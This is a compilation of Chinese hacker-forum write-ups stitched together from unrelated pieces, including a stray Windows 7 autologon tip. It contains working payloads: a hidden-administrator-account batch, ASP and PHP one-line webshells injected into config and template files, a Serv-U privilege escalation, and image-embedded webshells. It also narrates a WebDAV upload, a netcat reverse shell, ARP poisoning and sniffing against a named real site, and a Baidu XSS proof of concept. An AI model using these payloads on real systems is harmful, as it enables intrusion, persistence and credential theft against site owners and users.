详细说明：可以通过智能ABC输入法中V9里的空白字符建立隐藏帐号,命令行下无法建立,可以先写个批处理,如下:
net user  123 /add
net localgroup administrators  /add
注意其中的空白字符.非空格.
建立后命令行下用net user命令查看账户显示为空白,在用户界面中同样显示空白.
建立此帐号后无法在mstsc中直接输入登陆,需要在远程桌面的选项面板的常规选项卡中的用户名一栏里用智能ABC的V9输入特殊字符后再次连接.

漏洞证明：新建一个批处理,内容如下.
net user  123 /add
net localgroup administrators  /add
执行后查看用户管理界面,看看是否有个空白帐号.
修复方案：过滤这些特殊字符吧.

一般而言，后台插一句话，如果数据库扩展名是asp的话，那么插数据库，但是如果有配置文件可以插的话，那肯定是插入配置文件了，但是插入配置文件有一个很大的风险，那就是一旦出错那么全盘皆输，有可能不仅仅造成后台无法登陆，甚至有可能是整个网站系统崩溃，所以插入配置文件，请慎之又慎。

话归正题，如果想插入配置文件，一般是config.asp，那么首先需要了解这个文件的一般情况。

网站的配置一般是保存网站名，地址，email之类的，既然是字符，那么格式应当是
webname=“test website”

对于这样的配置插入一句话的话，我们的机会就是替换test website，那么需要闭合2个"，同时要插入一句话，语句可以这样

"%><%eval request("d"%><%s="

那么在config.asp中就是

webname=“ "%><%eval request("d"%><%s=" ”

第一个"是闭合前面的配置文件中的"，%>就是闭合前一段脚本，之后插入一句话<%eval request("d"%>，现在要闭合原来的"和%>

所以加入<%s="，这里特别要注意“s=”，如果没有这个等号的话，那么就会成<%" ",这样必将出错。

好了，这是常规的办法，现在我们回到开始那个问题，按照前面的方法插入

 

插入后，我们再点击“网站设置” ，出现错误

从这个错误，我们可以得到2个信息。

第一，配置文件的路径：http://www.target.com/zfbm/zfb/inc/config.asp

第二，网站名的变量为webname。

昨天由于很晚了，就没继续看，今天出差，晚上回来刚刚上Q，小刀刀就q我，说拿下了，并说这个后台过滤了双引号"，结合昨天的错误一看果然是，由于我们闭合前面双引号起"的那个双引号收"被过滤成单引号'，所以就成了webname=" '，这样的话那么这个双引号没有闭合，由于双引号是vbscript的控制符，没有闭合config.asp运行必然出错。那么我们遇到这种双引号被过滤了的情况改怎么办呢。

由于插入一句话必须要用双引号括起来，而输入双引号又被过滤，所以我们可以利用他们自身的双引号来解决。

在配置文件中，我们还可以看到这样一些设置

 
就是配置网站的公告数 ，文章数等。可以假设一下，他必然是整数赋值，没有双引号包括
num=5
num是整数型，不然就成字符了num="5"

那么我们的一句话就可以这样构建，如图

在公告数中我们插入5%><%eval request(webname)%><%

必须要有5，不然将会出错，在网站名中我们插入"open"

由于我们没有输入双引号，不存在过滤，我们利用 配置文件本身的双引号来达到目的。那么配置文件现在的内容如下
 

<% 
.................... 
webname="open" 
num=5%><%eval request(webname)%><% 
webnum=7 
....... 
%> 

我们的一句话就相应为
eval request("open")，open为密码。

用菜刀成功连接

  

从上可见，我们成功利用配置文件本身避开了一句话中双引号被过滤的问题。

那么在网页设计方面，我们可以增加过滤<,%,>或者组合<%,%>这些特殊符号，禁止这些符号的输入，那么将大大增加网页安全。

自己反复测试各种可行想到了这个方法
1：用Serv-U7.8.9提权脚本添加FTP用户 不执行第6步
2：flashFTP或者其他FTP上传工具登陆目录FTP
3：上传个加用户提权BAT  我这里传的C盘目录
ftp> quote site exec c:\1.bat
200 EXEC command successful (TID=42).

之前6.x的提权用的是反弹到本地，修改C盘为可写可执行再FTP连接quote site exec net.exe user XX XX /add
这里9.1执行提示没有这个文件
ftp> quote site exec net1.exe user admin$ 9331447 /add
550 /C:/net1.exe: No such file.
试了flashFTP连接替换sethc.exe劫持没成功，可能是对SHIFT劫持接触得比较少吧。文章的这个方法我是第一次用到所以写了出来

 
笔者通过扫描，发现存在了PUT为On的一个IP，很多时候存在PUT为yes，但是上传失败，可能是webdav被禁用或者目录没有写权限。然后利用老兵的iiswrite工具写入一句话马，写入成功，然后通过“MOVE”来改为ASP格式，但是这时候经常出错，最后只有改为.asp;.jpg这种格式才逃脱杀软的毒手。然后通过一句话客户端，上传了很多次都是服务器500错误，木马被杀，最后通过消灭和Psjj兄弟提供的webshell，成功。

 
简单看了下权限，还算比较大，通过webshell的下载功能上传了cmd，提权大杀器pr，nc。通过NC反弹到本地并且添加了一个用户，顺利添加了账户。并且成功登陆服务器。

 
到达服务器一般是先把服务器的洞子给补上，首先将“Web服务扩展”中的WebDAV给禁止，然后将网站属性，主目录的写入给去掉就可以了！

 
这时候，笔者才回过头来看目标站点，首先是简单ping了下cmd5.com的站点，无法ping通，然后通过ipconfig/all看了下子网掩码，发现子网掩码是255.255.255.128，哎，真的失望了，和目标不在一个网段，但是接下来，目标更加清晰了，只用到125.254.44.126去渗透一台服务器就好了，不出意外就会跟目标是同一个网段。

 
说干就干，和朋友饮恨操刀上了，这时候在目标2xx网段，利用简单社工的账户进入了某php168后台，这里需要说明的是，该php168系统已经是最新版本，通过模板那里直接添加大马已经不行，写入马后，就会马上被清了，然后笔者想到了select into这种方法，但是也失败了，提示信息是服务器拒绝这个普通的mysql账户。

  
折腾了很久没办法，在好友Robert的提醒下，笔者打算通过添加一个普通的模板文件，
Template/default/none.htm，通过写入
<script language="php">phpinfo()</script>
tested by black.eagle
这种文件，然后再“系统设置”-“网站首页设置”，点击提交，然后把首页生成静态页

  
大家可以看到oo.php确实已经执行了，但是笔者在none.htm，写为
<script language="php">
fputs(fopen("horind.php","w"),"<?eval(\$_POST[cmd]);?>")
</script>
tested by black.eagle
的话，eval被过滤为了eva l写为下面这种格式的话，确实写入了，但是无法通过一句话马的客户端“专家模式”来执行
<script language="php">assert($_POST[cmd])</script>
tested by black.eagle

 
至此告一段落，然后在寻寻觅觅中拾得一PHPCMS后台，这个后台也没少了瞎折腾，虽说phpcms拿webshell简单，这里无法执行sql，给管理禁用了，然后通过
admin.php?mod=phpcms&file=safe&action=see_code&files=eagle.php这种格式，由于写入种
种小马的原因没有成功，也希望各位看官以后直接上大马。

 
拿到了webshell，并且这管理的疏忽，系统权限到手！

 
看了下子网掩码，和cmd5.com同网段，好男儿，操刀上了！判断了网关，为.129，ping和tracert对方的IP都不通，看来有防火墙，ARP防火墙不好突破，那么只有稍微改变下cain的发包间隔，即毒化远程ARP缓存每隔19秒，默认的是30秒！

 
确实也嗅探了一些账号。

 
只不过，嗅探了一会机器就挂掉了，ping的时候说是目标网段不可达，笔者只能等到第二天，那么只能让IDC的客服帮我们重启下了啊，虽说是知道了，长城宽带的机房，但是不知道是哪个IDC啊，没办法，笔者先找了个该网段的站点，加了他们站长聊了下，成功获取信息。

  
然后通过上述获知的客服QQ，又联系上了负责该服务器的客服，等了差不多10分钟，机器就启动了，ping的时候也能通了，谢谢客服姐姐们的工作态度，此致敬礼！

等了些时候，获取了shell，也隐约感觉到目标可能做了CDN，因为IP变动很大。

 
如果CMD5的站长看到这篇文章，请也不要发火，笔者不是有意想渗透进去，希望能成为朋友！如果有什么问题，也请大家到黑帽论坛联系我！最后还是要感谢Robert和PSJJ

    操作过程如下：

    1、在开始菜单搜索框输入 “netplwiz” 按回车，打开高级用户控制面板；

    2、在高级用户控制面板中，取消对“要使用本机，用户需输入用户名和密码(E)”项的勾选；

    3、系统将弹出窗口要求输入默认登录系统的用户名和密码，输入完成后点击确定；

    4、重启Windows 7，即可发现系统自动以默认用户登录。

    注：由于Windows 7与Vista的核心相差不大，此方法对Vista同样适用。

这个虚拟主机还算不错，才三分钟，就Packets: 260这么多包了
一个通宵抓包，好了，该分析日志了。
日志下载下来，因为虚拟主机，监听的是整个服务器，信息量太大，只能有选择的分析，搜索admin、pass、user、login等等有选择的看包。
从抓包中发现，很多人在暴力猜解ftp密码。。。晕，这是何苦呢
搜索admin这一关键词时有这么一个部分引起了我的注意，如图：

目录是admin下的文件，而且还有Cookie。。。很明显。呵呵
再看往下：
POST: /Admin/sent.asp HTTP/1.1

Via: 1.0 PROXY

Cookie: ASPSESSIONIDASQASTBB=JIBGEFDDOJIALLHIOMHNOMOG

Referer: http://www.xxx.com/Admin/sent.asp

Content-Type: application/x-www-form-urlencoded

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)

Host: www.xxx.com

Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*

Accept-Language: zh-cn

UA-CPU: x86

Pragma: no-cache

Connection: Keep-Alive

Content-Length: 13

pass=buqiuren

慢慢来看，无关的跳过了哈

POST: /Admin/sent.asp

发送指令到admin目录的sent.asp

Cookie: ASPSESSIONIDASQASTBB=JIBGEFDDOJIALLHIOMHNOMOG

这个不用解释了吧，用session，session似乎不能像Cookie那样欺骗，能我也不会

Referer: http://www.xxx.com/Admin/sent.asp

完整的url估计就是这个不错了，打开看看。居然是webshell
这下就更省事了

 好了，继续往下看：

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)

反正不是我机器上的
下面的越看越无聊，直接跳到最后：

pass=buqiuren

输入密码：buqiuren即可登录

下面就是批量清马，清理找webshell了
PS：做人要积德，挂马盗号这样的无德无良的事情最好不要干，修复漏洞，留张条就行了。罪过啊罪过
look，挂马的信息也抓出来了。。。。好无聊

POST /Admin/sent.asp?Action=plgm&code=<script%20src=http://%25%37%39%2E%73%25%36%39%6E%25%36%31%25%33%31%25%33%36%33%25%32%45%25%36%39%25%36%45%66%25%36%46></script> HTTP/1.1

Via: 1.0 PROXY

Cookie: ASPSESSIONIDASQASTBB=JIBGEFDDOJIALLHIOMHNOMOG

Referer: http://www.xxx.com/Admin/sent.asp?Action=plgm&code=<script%20src=http://%25%37%39%2E%73%25%36%39%6E%25%36%31%25%33%31%25%33%36%33%25%32%45%25%36%39%25%36%45%66%25%36%46></script>

Content-Type: application/x-www-form-urlencoded

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)

Host: www.xxx.com

Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*

Accept-Language: zh-cn

UA-CPU: x86

Pragma: no-cache

Connection: Keep-Alive

Content-Length: 153

symantec的一个蠕虫报告：
http://www.symantec.com/connect/blogs/w32temphid-usb

漏洞产生的流程分析：
http://community.websense.com/blogs/securitylabs/archive/2010/07/20/microsoft-lnk-vulnerability-brief-technical-analysis-cve-2010-2568.aspx

exploit-db的漏洞报告和POC：
http://www.exploit-db.com/exploits/14403/

微软漏洞报告及影响环境：
http://www.microsoft.com/technet/security/advisory/2286198.mspx

Metasploit Penetration Testing Framework：
http://www.metasploit.com/modules/exploit/windows/browser/ms10_xxx_windows_shell_lnk_execute

SRP的防御策略：
http://blog.didierstevens.com/2010/07/20/mitigating-lnk-exploitation-with-srp/

didierstevens自己的软件Ariad的防御策略：
http://blog.didierstevens.com/2010/07/18/mitigating-lnk-exploitation-with-ariad/

Microsoft Fix it 50486(修复工具)：
http://go.microsoft.com/?linkid=9738980
此工具有个bug，会使任务栏以及开始菜单的图标变为白色，请酌情使用，或者是等待微软发布正式补丁。

如果使用上述修复工具出现未知错误，请用此工具撤销修复：
http://go.microsoft.com/?linkid=9738981

看来是检查是不是图片了，这个好办，直接写了个一句话马，找了张正常图片，
Copy /b 1.jpg+2.asp 3.asp
成功上传，但结果用客户端连接却不成功，不晓得程序还在哪里做了检查。
郁闷了半小时，突然灵光一现，想到前段时间听朋友讲的数字水印，可以图片空隙处添加隐藏的水印，那偶们可不可以在图片的空隙处加上一个一句话马呢？
马上操刀测试。 

我用c32asm在上面那个小图中空白的区域加了ASPX的一句话马，ASP一句当然也一样的。
再上传。
成功获得SHELL，突破了网站的限制。

最后，一点小经验，GIF的空隙很少，BMP的空隙多但是太大，不适合上传，最好用JPG图片来插了哈，呵呵

一 综述
百度模块分享平台(http://act.hi.baidu.com/widget)是百度于2008年8月发布的，借此平台，用户可以方便地升级扩展空间的功能，用户之间还可以将自己制作的模块与别人共享,
经过测试发现模块“我的豆瓣收藏秀”即：http://act.hi.baidu.com/widget/info/10624存在xss漏洞，当攻击者应用该模块，可导致在hi.baidu插入恶意的js/html代码。

二 PoC

应用模块: http://act.hi.baidu.com/widget/info/10624

设置：豆瓣ID:12"></object><img src=2 onerror=alert(document.domain)><div "